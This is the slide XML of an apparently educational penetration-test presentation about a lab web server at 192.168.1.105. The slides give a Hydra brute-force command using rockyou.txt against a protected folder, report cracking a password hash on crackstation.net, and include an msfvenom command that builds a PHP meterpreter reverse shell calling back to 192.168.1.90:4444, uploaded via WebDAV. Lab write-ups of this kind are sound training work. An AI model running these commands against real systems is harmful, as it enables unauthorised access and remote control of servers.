            <a:off x="6945970" y="2725175"/>
            <a:ext cx="2078925" cy="1638507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17161EA-CF79-81A9-00DF-3E51046D8ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4001492" y="2374809"/>
            <a:ext cx="2320367" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Navigating through the webserver at 192.168.1.105, we can notice how the web page is laid out and investigate the folders. We come across Ashton, who has an interesting biography. We see that there is a /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> that we can navigate through.</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Exploitation: Brute-force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p6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12" name="Google Shape;1112;p62"/>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2"/>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Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used Hydra, a hacking tool, with the password list from rockyou.txt and Ashton’s name for username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –P rockyou.txt –s 80 –f 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>A hash was obtained for Ryan’s password</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Google Shape;1115;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16" name="Google Shape;1116;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 name="Google Shape;1117;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;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19" name="Google Shape;1119;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0" name="Google Shape;1120;p62"/>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2"/>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Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I was successfully able to crack Ashton’s password and tested to verify.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Gained access to /secret_folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Gainded access to /webdav</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Cracked Ryan’s hash password using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>crackstation.net</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;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24" name="Google Shape;1124;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5" name="Google Shape;1125;p62"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>[INSERT: screenshot or command output illustrating the exploit.]</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{427D84A9-99E5-2254-C4F5-220C6E9F9CFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134081" y="1480575"/>
            <a:ext cx="2930255" cy="2372447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text, website&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C8147B-8275-6A84-2D8A-12868F2552E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267628" y="3774523"/>
            <a:ext cx="2638594" cy="114207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Exploitation: Brute-force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p6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12" name="Google Shape;1112;p62"/>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2"/>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endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Google Shape;1115;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rgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Google Shape;1116;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Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74BE596A-2FAB-6368-9139-D1F85AEEC49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126714" y="684140"/>
            <a:ext cx="4224162" cy="1592771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651C7C8F-4BFD-A60F-8B1E-4C41F2FB2C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1768210"/>
            <a:ext cx="4689907" cy="2866589"/>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24CBA0CB-3222-A3B1-A595-717A9C4E7E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472026" y="684140"/>
            <a:ext cx="3078632" cy="1820213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9CF73F-6493-C75B-EFD6-BEFAC433496E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6048227" y="2571750"/>
            <a:ext cx="2825312" cy="2276910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2225095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Exploitation: R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verse Shell Backdoor CVE-2019-13386</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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33" name="Google Shape;1133;p63"/>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3"/>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Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created and uploaded a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.90 LPORT=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
